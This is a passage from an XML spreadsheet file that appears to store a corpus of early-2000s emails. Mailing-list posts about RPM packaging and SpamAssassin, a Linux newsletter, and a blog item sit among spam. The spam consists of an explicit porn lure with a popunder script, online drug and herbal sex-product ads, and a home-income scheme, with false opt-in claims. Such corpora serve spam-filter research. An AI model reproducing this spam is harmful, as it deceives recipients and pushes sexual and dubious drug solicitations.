 &gt; etc.
 This wouldn't be worth the effort involved IMHO, and would probably end up
 in relative breakage of a few systems if not carefully tested.
 Your first example is a good one, because I really think it's even easier
 currently :
 1. Leave your current kernel as-is
 2. Get the "alsa-driver" source rpm
 3. Rebuild and install resulting packages
 Drivers that are written to be easily compiled as modules (like ltmodem,
 NVidia, ALSA etc.) can easily be repackaged separately as rpms and ported
 as easily for various kernel rpms from the source rpm.
 Also, what you describe is sort of the opposite of what rpm packaging is in
 my mind. I see it more as a "one size fits all" achievement in the general
 case. And kernel isn't an exception (although there are packages optimized
 for various processors) since they all come with just about all the modules
 you'll ever need. Make that "one size fits many" then if you want ;-)
 Last but not least : The kernel is something I'm trying to keep away from
 in my packaging since I really don't want to see newbies screwing up their
 systems because of packages on my website... same goes for GNOME, KDE and
 other major bits of the distribution since I also want people who happily
 use my packages to be able to upgrade to the next Red Hat Linux release
 without having their system turned into another Ximian mess.
 Matthias
 PS: Yes Chris, I'm worried about not giving you too much work! Less in fact
 since you can easily answer "freshrpms.net!" to people asking how to play
 DVDs, right? ;-))))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</si>
  <si>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Keep porn free...
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_683_88588225468343301146121008774
 Content-Type: text/plain;
 	charset=iso-8859-1
 Content-Transfer-Encoding: Quoted-Printable
 I know you want to look at pussy, but first you need to learn The Truth about =
 the adult industry: 
 Get Into Paysites Free! 
 If you take 2 minutes to read what I have to say you will have full access  =
 to some of the largest membership sites for free. 
 http://www.americanteensluts.com/fpp/rune/rune4.html
 This costs you nothing! 
 ------=_NextPart_683_88588225468343301146121008774
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!doctype html public "-//w3c//dtd html 4.0 transitional//en"&gt;
 &lt;html&gt;
 &lt;head&gt;
    &lt;meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; U) =
 [Netscape]"&gt;
    &lt;title&gt;        Free porn passes to all the top sites
     &lt;/title&gt;
 &lt;script&gt;
 win=3Dwindow.open("http://www.americanteensluts.com/fpp/rune/rune4.html")
 win.blur()
 window.focus()
 &lt;/script&gt;
 &lt;/head&gt;
 &lt;body text=3D"#FFFFFF" bgcolor=3D"#0033CC" link=3D"#FFCC00" vlink=3D"#551A8B" =
 alink=3D"#FF0000"&gt;
 &lt;center&gt;&lt;a href=3D"http://www.americanteensluts.com/fpp/rune/rune4.html" =
 TARGET=3D"NEW"&gt;&lt;img SRC=3D"http://www.americanteensluts.=
 com/fpp/rune/images/pornpassgif_r1_c1.gif" NOSAVE BORDER=3D0 height=3D167 =
 width=3D740&gt;&lt;/a&gt;
 &lt;p&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D+2&gt;I know you want to look at
 pussy, but first you need to learn&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D+2&gt;The &lt;font =
 color=3D"#FFCC00"&gt;Truth
 &lt;/font&gt;about the adult industry:&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font color=3D"#FFCC00"&gt;&lt;font size=3D+4&gt;Get
 Into Paysites Free!&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D+2&gt;If you take &lt;font =
 color=3D"#FFCC00"&gt;2
 minutes&lt;/font&gt;&lt;font color=3D"#0000FF"&gt; &lt;/font&gt;to read what I have to say
 you will have full access&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D+2&gt;to some of the largest =
 membership
 sites for free.&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D+4&gt;&lt;a href=3D"http://www.=
 americanteensluts.com/fpp/rune/rune4.html" TARGET=3D"NEW"&gt;CLICK
 HERE&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;p&gt;&lt;i&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font color=3D"#FF0000"&gt;&lt;font size=3D+2&gt;This
 costs you nothing!&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/i&gt;
 &lt;p&gt;
 &lt;hr WIDTH=3D"700"&gt;&lt;/center&gt;
 &lt;center&gt;&lt;table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D10 WIDTH=3D"750" =
 BGCOLOR=3D"#33CCFF" &gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;center&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font color=3D"#000000"&gt;&lt;font size=3D-2&gt;This
 email was sent to you via Saf-E Mail Systems.&amp;nbsp; Your email address
 was automatically inserted into the To and From addresses to eliminate
 undeliverables which waste bandwidth and cause internet congestion. Your
 email or webserver &lt;b&gt;IS NOT &lt;/b&gt;being used for the sending of this mail.
 No-one else is receiving emails from your address. You may utilize the
 removal link below if you do not wish to receive this mailing.&amp;nbsp;=
 &lt;/font&gt;&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D-2&gt;&lt;font =
 color=3D"#000000"&gt;Please&lt;/font&gt;
 &lt;a href=3D"http://mailtrain.59i.net/DB_Agents/user_cancel.asp?=
 id=3D184&amp;language=3Dgb2312"&gt;Remove Me&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;p&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font color=3D"#000000"&gt;&lt;font size=3D-2&gt;Saf-E
 Mail Systems, PO Box 116-3015 San Rafael de Heredia, CR&amp;nbsp; =
 011-506-267-7139&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_683_88588225468343301146121008774--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Catalog of Tomorrow released
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85517490
 Date: Not supplied
 Mark and I were two of many wonderful contributors to a new book from TechTV, 
 called "The Catalog of Tomorrow." It's like a Whole Earth Catalog for 
 futuristic technologies, with great illustrated spreads throughout -- you can 
 get a peek inside at Amazon[1], and buy from Powell's or your other favorite 
 indie store. Link[2] Discuss[3] (_Thanks, Andrew!_)
 [1] http://www.amazon.com/exec/obidos/tg/detail/-/0789728109/ref=lib_dp_TFCV/104-0366981-9801540?v=glance&amp;vi=reader#reader-link
 [2] http://www.powells.com/cgi-bin/biblio?inkey=62-0789728109-0
 [3] http://www.quicktopic.com/boing/H/Fh8aUanpPCe
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Real Drugs-Viagra and Phentrimine!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#00CCCC" text="#000000"&gt;
 &lt;table width="400" border="0" cellspacing="1" cellpadding="8" bgcolor="#000000" align="center"&gt;
  &lt;tr&gt;
 	&lt;td bgcolor="#FFFFFF" align="center"&gt; &lt;font size="3"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;Real 
 	 Drugs - Viagra and Phentrimine&lt;/font&gt;&lt;/b&gt;&lt;/font&gt; 
 	 &lt;hr size="1" noshade&gt;
 	 &lt;center&gt;
 		&lt;font size="3"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;Order all you 
 		favorite drugs on line. &lt;br&gt;
 		&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;
 		&lt;hr size="1" noshade&gt;
 		&lt;font size="3"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;a href="http://r.mb00.net/s/c?1dx.2pdp.1.fne.fsi52 "&gt;Click 
 		Here For Viagra, Phentrimine and more!&lt;/a&gt;&lt;/font&gt; &lt;/b&gt; &lt;/font&gt; 
 	 &lt;/center&gt;
 &lt;/td&gt;
  &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;HTML&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;CENTER&gt;
 &lt;TABLE WIDTH="540" CELLSPACING=2 CELLPADDING=3 BORDER=0&gt;
 &lt;FORM METHOD=GET ACTION="http://i.mb00.net/cgi-bin/pmg_subscribe.pl"&gt;
 &lt;TR&gt;
   &lt;TD BGCOLOR="#DDDDDD"&gt;
   &lt;FONT FACE="helvetica,arial" SIZE="-1" COLOR="#000000"&gt;
     &lt;I&gt;Remove yourself from this list by either:&lt;/I&gt;
   &lt;/FONT&gt;
   &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
   &lt;TD BGCOLOR="#EEEEEE"&gt;
   &lt;FONT FACE="helvetica,arial" SIZE="-1" COLOR="#000000"&gt;
   Entering your email address below and clicking REMOVE:&lt;BR&gt;
     &lt;CENTER&gt;
     &lt;INPUT TYPE="hidden" NAME="list" VALUE="ebargains:*"&gt;
     &lt;INPUT TYPE="hidden" NAME="server_action" VALUE="Unsubscribe"&gt;
     &lt;INPUT TYPE="text" NAME="email_address" VALUE="cypherpunks@einstein.ssz.com" SIZE=25&gt;&lt;/FONT&gt;
     &lt;INPUT TYPE="submit" VALUE="REMOVE"&gt;
     &lt;/CENTER&gt;
   &lt;/FONT&gt;
   &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR ALIGN="CENTER"&gt;
   &lt;TD&gt;
   &lt;FONT FACE="helvetica,arial" SIZE="-1" COLOR="#000000"&gt;
     &lt;B&gt;&lt;I&gt;OR&lt;/I&gt;&lt;/B&gt;
   &lt;/FONT&gt;
   &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
   &lt;TD BGCOLOR="#EEEEEE"&gt;
   &lt;FONT FACE="helvetica,arial" SIZE="-1" COLOR="#000000"&gt;
   Reply to this message with the word &amp;quot;remove&amp;quot; in the subject line.
   &lt;/FONT&gt;
   &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/FORM&gt;
 &lt;TR ALIGN="CENTER"&gt;
   &lt;TD BGCOLOR="#FFFFFF" ALIGN="CENTER"&gt;
   &lt;FONT FACE="helvetica,arial" SIZE="1" COLOR="#000000"&gt;
   This message was sent to address cypherpunks@einstein.ssz.com
   &lt;/FONT&gt;
 &lt;!--
 X-PMG-Recipient: cypherpunks@einstein.ssz.com
 X-PMG-Msgid: 1026932205.4671
 X-PMG-Userid: ebargains:*
 --&gt;
 &lt;DIV ALIGN="CENTER"&gt;
 &lt;FONT FACE="helvetica,arial" SIZE="1" COLOR="#AAAAAA"&gt;pmguid:1dx.2pdp.fsi52&lt;/FONT&gt;&lt;/DIV&gt;&lt;BR CLEAR="ALL"&gt;
 &lt;IMG SRC="http://r.mb00.net/s/o?1dx.2pdp.0.fsi52" WIDTH=33 HEIGHT=12 BORDER=0 ALIGN="RIGHT" ALT="pmg"&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/CENTER&gt;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</si>
  <si>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Ouch...
</t>
  </si>
  <si>
    <t xml:space="preserve">Eirikur said:
 &gt; This incident is an interesting microcosm of how society and law develop.
 &gt; The women of this town are attempting to regulate competition.  The social 
 &gt; standards mechanisms (I expect that shame has already been tried) have 
 &gt; failed, so legal is next. 
 The point could also be to hassle the sunbather for reasons not given in
 the story.  The sunbather has probably pissed off the complainers in other
 ways, too.
 Law and society are wholeheartedly trivial.  Big fuzzy concepts like
 "sluts vs. moms" are convenient vehicles for petty disputes as often as
 not.
 - Lucas
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: MEN &amp; WOMEN, TURBO BOOST YOUR DRIVE!           KVPB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</si>
  <si>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&lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table border=3D"0" width=3D"423" height=3D"166" bgcolor=3D"#800080"&gt;
   &lt;tr&gt;
     &lt;td width=3D"464" height=3D"160"&gt;
 &lt;table border=3D"0" width=3D"100%" height=3D"110" bordercolor=3D"#FFFF99" =
 bgcolor=3D"#FFFF00"&gt;
   &lt;tr&gt;
     &lt;td width=3D"514" height=3D"22" bgcolor=3D"#FFFF99" align=3D"center"&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face=3D"Verdana" color=3D"#FF0000" size=3D"2"&gt;NEW! -&amp;gt;&lt;/font=
 &gt;&lt;font face=3D"Verdana" color=3D"#FF0000" size=3D"3"&gt;
 Vigoral Herbal Love Enhancers &lt;/font&gt;&lt;font face=3D"Verdana" color=3D"#FF00=
 00" size=3D"2"&gt;&amp;lt;- NEW!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width=3D"514" height=3D"82" bgcolor=3D"#800080" align=3D"center"&gt;
 &lt;b&gt;&lt;font face=3D"Times New Roman" size=3D"3" color=3D"#FFFFCC"&gt;Straight fr=
 om our lab to you!&lt;/font&gt;&lt;/b&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;br&gt;
 &lt;b&gt;&lt;font face=3D"Tahoma" size=3D"2" color=3D"#FFFFFF"&gt;We Now Offer &lt;/font&gt;=
 &lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"2" color=3D"#FFFFFF"&gt;3
 NEW - &lt;/font&gt;&lt;i&gt;&lt;font face=3D"Tahoma" size=3D"2" color=3D"#FFFFCC"&gt;Special=
 ly Formulated
 &amp;amp; 100% Natural&lt;/font&gt;&lt;/i&gt;&lt;font color=3D"#FFFFFF" face=3D"Tahoma" size=3D=
 "2"&gt; - products to help stimulate your moments with that special someone f=
 or&lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"2" color=3D"#FFFF99"&gt;
 &lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#FFFF99" size=3D"3"&gt;Only
 $24.99!&lt;/font&gt;&lt;/b&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"460" height=3D"78"&gt;
   &lt;tr&gt;
     &lt;td width=3D"521" height=3D"72" bgcolor=3D"#CC0066" align=3D"center" s=
 tyle=3D"border-bottom-style: solid; border-bottom-color: #FFFF99"&gt;
 &lt;p&gt;&lt;font size=3D"2"&gt;&lt;i&gt;&lt;b&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF"&gt;&amp;quot;Th=
 e Most
 Exciting Love
 Making Experience We've Ever Had!&lt;br&gt; Vigoral is #1, Hands Down!&amp;quot;&lt;/fo=
 nt&gt;&lt;font color=3D"#FFFF99"&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;=
 nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nb=
 sp;
 &amp;nbsp;&amp;nbsp;
 &lt;font face=3D"Tahoma"&gt;- Ricardo &amp;amp; Isabelle P. of Las Vegas, NV&lt;/font&gt;&lt;=
 /font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
       &lt;table border=3D"0" width=3D"460" height=3D"106" bgcolor=3D"#800080"=
  bordercolor=3D"#FFFF99"&gt;
         &lt;tr&gt;
           &lt;td width=3D"34%" height=3D"100" bordercolor=3D"#FFFF99"&gt;
             &lt;div align=3D"center"&gt;
               &lt;center&gt;
               &lt;table border=3D"1" width=3D"139" height=3D"84" bordercolor=3D=
 "#FFFFFF"&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"131" height=3D"81" bgcolor=3D"#000080" alig=
 n=3D"center"&gt;&lt;font color=3D"#FFFFFF" size=3D"5" face=3D"Impact"&gt;&lt;i&gt;SUPER&lt;/=
 i&gt;&lt;/font&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"5" face=3D"Tahoma"&gt;
                     Vigoral&lt;br&gt;&lt;/font&gt;&lt;/b&gt;&lt;i&gt;&lt;b&gt;&lt;font face=3D"Verdana" siz=
 e=3D"2" color=3D"#FFFF00"&gt;For
                     Men&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
               &lt;/center&gt;
             &lt;/div&gt;
           &lt;/td&gt;
           &lt;td width=3D"33%" height=3D"100" align=3D"center"&gt;
             &lt;div align=3D"center"&gt;
               &lt;center&gt;
               &lt;table border=3D"1" width=3D"136" bgcolor=3D"#CCCCFF" height=
 =3D"81" bordercolor=3D"#FFFFFF"&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"138" align=3D"center" height=3D"77"&gt;&lt;font c=
 olor=3D"#FF00FF"&gt;&lt;i&gt;&lt;font size=3D"5" face=3D"Impact"&gt;SUPER&lt;/font&gt;&lt;/i&gt;&lt;/fon=
 t&gt;&lt;b&gt;&lt;font size=3D"5" color=3D"#FF00FF"&gt;&lt;font face=3D"Tahoma" size=3D"5"&gt;
                     &lt;/font&gt;&lt;font face=3D"Tahoma"&gt;
                     Vigorette&lt;/font&gt;&lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"5=
 " color=3D"#990099"&gt;&lt;br&gt;&lt;/font&gt;&lt;i&gt;&lt;font face=3D"Verdana" size=3D"2" color=3D=
 "#9966FF"&gt;For
                     Women&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
               &lt;/center&gt;
             &lt;/div&gt;
           &lt;/td&gt;
           &lt;td width=3D"33%" height=3D"100"&gt;
             &lt;div align=3D"center"&gt;
               &lt;center&gt;
               &lt;table border=3D"1" width=3D"134" bgcolor=3D"#CC0066" height=
 =3D"83" bordercolor=3D"#FFFFFF"&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"126" height=3D"79" align=3D"center" bgcolor=
 =3D"#CC0066"&gt;&lt;font size=3D"5" color=3D"#FFFFCC"&gt;&lt;i&gt;&lt;font face=3D"Impact"&gt;S=
 UPER&lt;/font&gt;&lt;/i&gt;&lt;/font&gt;&lt;b&gt;&lt;font face=3D"Tahoma" color=3D"#CC6699" size=3D"5=
 "&gt;
                     &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"5" color=3D"#FFFF=
 CC"&gt;Vigorgel&lt;/font&gt;&lt;font color=3D"#990099" face=3D"Tahoma" size=3D"5"&gt;&lt;br&gt;=
 &lt;/font&gt;&lt;i&gt;&lt;font face=3D"Verdana" size=3D"2" color=3D"#FFFFFF"&gt;For
                     Everyone!&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
               &lt;/center&gt;
             &lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
 &lt;table border=3D"0" width=3D"100%" bgcolor=3D"#FFFF99" height=3D"62"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" align=3D"center" height=3D"29" bgcolor=3D"#800080"&gt;=
 &lt;b&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;All
       Only &lt;u&gt; $24.99&lt;/u&gt; each &amp;amp; Get FREE Shipping!*&lt;br&gt;&lt;/font&gt;&lt;font f=
 ace=3D"Verdana" color=3D"#FFFFFF" size=3D"2"&gt;-LIMITED
       TIME OFFER-&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" align=3D"center" height=3D"29" bgcolor=3D"#FFFF99"&gt;=
 &lt;b&gt;&lt;u&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FF0000"&gt;&lt;a style=3D"color=
 : #FF0000"&gt;-&amp;gt;
       &lt;/a&gt;&lt;a href=3D"http://www.mailcomesandgoes.com" style=3D"color: #FF0=
 000; text-decoration: underline"&gt;CLICK
       HERE TO ORDER NOW! &amp;lt;-&lt;/a&gt;&lt;/font&gt;&lt;/u&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;br&gt;&lt;/p&gt;
 &lt;table border=3D"0" width=3D"470" bgcolor=3D"#800080" height=3D"68"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" align=3D"center" height=3D"64"&gt;&lt;font face=3D"Arial"=
  size=3D"1" color=3D"#FFFFFF"&gt;Your
       email address was obtained from an opt-in list, Opt-in MRSA List &lt;br=
 &gt; &amp;nbsp;Purchase
       Code # 248-3-550.&amp;nbsp;&amp;nbsp;If you wish to be unsubscribed from thi=
 s list, please
       &lt;a href=3D"mailto:print5@btamail.net.cn?Subject=3DUnsubcribe Immedia=
 tely" style=3D"color: #FFFFCC"&gt;Click
       here&lt;/a&gt; and press send to be removed. If you have previously
       unsubscribed and are still receiving this message, you may email our=
  &lt;a href=3D"mailto:sortofridiculous@bigfoot.com?Subject=3DAbuse Report" st=
 yle=3D"color: #FFFFCC"&gt;Abuse
       Control Center&lt;/a&gt;. We do not condone spam in any shape or form. Tha=
 nk You
       kindly for your cooperation&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&lt;font face=3D"Arial" size=3D"1" color=3D"#9966FF"&gt;*Note: free shipping =
 on orders of
 three or more of any product.&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Financial Freedom That You Deserve...
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;&lt;/TITLE&gt;&lt;/HEAD&gt;
 &lt;BODY BGCOLOR="White" TEXT="Navy" LINK="Blue" VLINK="Green" ALINK="Teal"&gt;
 &lt;CENTER&gt;
 &lt;B&gt;&lt;FONT SIZE="+2" FACE="Arial" COLOR="Green"&gt;
 Earn the Extra Income That You So Need and Deserve!&lt;/FONT&gt;&lt;P&gt;
 &lt;FONT SIZE="+1" FACE="Arial" COLOR="Navy"&gt;
 Gain Freedom and Wealth - Others Are  Why Not You?&lt;P&gt;
 Complete State of the Art System - Home Based - NOT MLM!&lt;P&gt;&lt;/FONT&gt;
 &lt;FONT SIZE="+1" FACE="Arial" COLOR="Red"&gt;
 No Experience! - No Inventory! - No Credit Checks! - No Hassles!&lt;/FONT&gt;&lt;P&gt;
 &lt;A HREF="http://impacts.affil-network.com/biz/"&gt;FREE INFORMATION&lt;/A&gt;&lt;BR&gt;&lt;/B&gt;
 ___________________________________________________________&lt;BR&gt;
 Your e-mail address has been verified as one that has requested information on these offers.&lt;BR&gt; 
 All e-mail addresses have been double verified.&lt;BR&gt;
 If this message has come to you in error,&lt;BR&gt;
 Please click &lt;A HREF="mailto:montage@btamail.net.cn?subject=Remove"&gt;REMOVE ME&lt;/A&gt; and your name will be removed from all future mailings.&lt;BR&gt;
 ____________________________________________________________
 &lt;/CENTER&gt;&lt;/FONT&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] checking out Razor2 (and SA 2.41) install - Net::DNS:Resolver problem? 
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Gary Funck said:
 &gt; I thought the "&gt;&gt; /perllocal.pod" line looked odd. Is it normal to write
 &gt; documentation into the root directory? (&lt;g&gt;). Is there some Make parameter, o
 &gt; r
 &gt; environment variable that should've been set when I ran "make"?
 an issue for Razor folks I think.
 &gt; It seems that by registering that I avoided the error path noted in my previo
 &gt; us
 &gt; e-mail where DNS::Net::Resolver was called, but does not exist in my Perl
 &gt; hierarchy.  Here's the new output from SA ans Razor2:
 looks good.
 &gt; Question: if we use spamassassin on a per-user basis, invoked from procmailrc
 &gt; ,
 &gt; will each user have to run "razor-admin -register" first? Is there way to
 &gt; register with Razor just once per system?
 If you use spamd with the -H option and provide a shared directory for
 the razor config files to be written to.  RTFM for more details...
 --j.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Penguin Shell]  Karaoke Kernel
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/penguinshell/07.10.2002.html"&gt;
       http://www.lockergnome.com/issues/penguinshell/07.10.2002.html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&lt;/style&gt;&lt;title&gt;07.10.2002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07.10.2002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I've just got a few quick thoughts today.&lt;p&gt;
 First, the search is underway for the hosting solution mentioned in Monday's Penguin Shell. The response has been great, with more than two dozen offers of web space for the Foundation for Children and Youth With Diabetes. It gratifying to see our community rally around a great cause. Know that whether you answered the call or not, you're in the electronic company of some caring and compassionate folks. I've not yet heard whether a solution has been found from among the many offered, but I'll certainly keep you posted on the outcome.&lt;p&gt;
 Second, a few final clarifications on the 4th of July bruhaha. A reader brought to my attention that, though he didn't believe it to be the case, offering my opinion on the state of America could be seen as trolling. That certainly wasn't intended. Also, I've seen much email over the past week that started with, "Since you published the opinion of someone outside the US, I'd expect that you'll publish an opinion in disagreement." Well, I did that already - it was my own opinion that started the discussion. I can clearly see the potential for this to get out of hand. So, this will be the last word on the subject. Thanks for your opinions and your discussion, the vast majority of which was well-thought and reasonable. Both sides were presented and we're moving on.&lt;p&gt;
 On to some Lockergnome news. If you haven't already heard, 
 &lt;a href="http://www.clevermedia.com/" target="_blank"&gt;CleverMedia&lt;/a&gt; is sponsoring karaoke night at &lt;a href="http://www.gnomedex.com/" target="_blank"&gt;Gnomedex&lt;/a&gt;. According to the woman with her finger on the pulse of Gnomedex, Lori Lockwood, "There is definitely a 'surprise' in the works for the attendees ... " Hmmm. Could it even compare to last year's Miss Gnomedex contest? I think it unlikely. In any regard, the folks at CleverMedia are certainly more than capable of coming up with loads of fun -- it's what they do for a living! Between &lt;a href="http://www.leoville.com/" target="_blank"&gt;Leo Laporte&lt;/a&gt;, &lt;a href="http://doc.weblogs.com/" target="_blank"&gt;Doc Searls&lt;/a&gt;, &lt;a href="http://www.grc.com/" target="_blank"&gt;Steve Gibson&lt;/a&gt;, &lt;a href="http://www.analogx.com/" target="_blank"&gt;Mark Thompson&lt;/a&gt;, &lt;a href="http://www.evhead.com/" target="_blank"&gt;Evan Williams&lt;/a&gt;, and too many others to mention, you'd be silly to miss out.&lt;p&gt;
 Onward. Have a great day.&lt;p&gt;&lt;p&gt;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&lt;b&gt;Windows Apps in Linux? - Part II&lt;/b&gt;&lt;p&gt;
 I don't want to mince any words, here. &lt;a href="http://www.codeweavers.com/ target="_blank"&gt;CodeWeavers&lt;/a&gt; has really hit a sweet spot with their recently-released &lt;a href="http://codeweavers.com/products/office/" target="_blank"&gt;CrossOver Office&lt;/a&gt; product. This is, quite simply, the fulfillment of the promise of the &lt;a href="http://wine.codeweavers.com/" target="_blank"&gt;Wine Project&lt;/a&gt;. Using this slick little app, virtually all the applications in the Microsoft Office suite are fully functional in Linux. Frankly, I never thought I'd see the day when running Windows apps in Linux was exciting. Maybe it's time to take up shucking ice cubes in the blasted lands.&lt;p&gt;
 Let's break this product up a bit. If purchased as a bundle, both CrossOver Office and &lt;a href="http://codeweavers.com/products/crossover/" target="_blank"&gt;CrossOver Plugin&lt;/a&gt; (as we discussed yesterday) share an install script. They do, however, require separate install processes, so they need to be launched individually from a shared window.&lt;p&gt;
 I started the CrossOver Office install, dropped my Office 2000 disc in the CD drive, and fired up the install. It looked and performed exactly as you'd expect to see it in Windows. I was able to customize the install, as I always have, then let it run. At the end of the process, CrossOver Office "fakes" a Windows reboot and the Office suite installation is complete.&lt;p&gt;
 Even Internet Explorer 5.0 is installed. There's an option in the CrossOver Office package to install IE 5.5 but, to my chagrin, this was the one area of the install that failed. Actually, the install itself may have succeeded - I was just left without an IE browser following the upgrade. It's hard to tell whether that was a fault in CrossOver Office, or in the IE program itself.&lt;p&gt;
 For the most part, these apps perform in Linux as they do in Windows. The IE install was a bit kludgy, with some font problems and an inability to customize the toolbar. Word worked perfectly, allowing me even to pull together legal documents for a friend's business without so much as a hiccup. Even printing works well with the installation of a "Wine Postscript Printer" driver.&lt;p&gt;
 Let me reiterate something I said yesterday. I've watched the Wine Project walk, then crawl, then walk again over the past few years. I've always suspected that the fits and starts were not for lack of talent. With the financial backing of CodeWeavers, it appears that my suspicions were well founded. Wine has, through CrossOver Office and CrossOver Plugin, matured to a level of useability that should easily attract Linux users throughout the spectrum of experience. In the big picture, widespread acceptance of these products could remove the last remaining roadblock for many current Windows users to make the leap to Linux: the loss of Word and Excel. They simply don't need to fear those losses any more.&lt;p&gt;
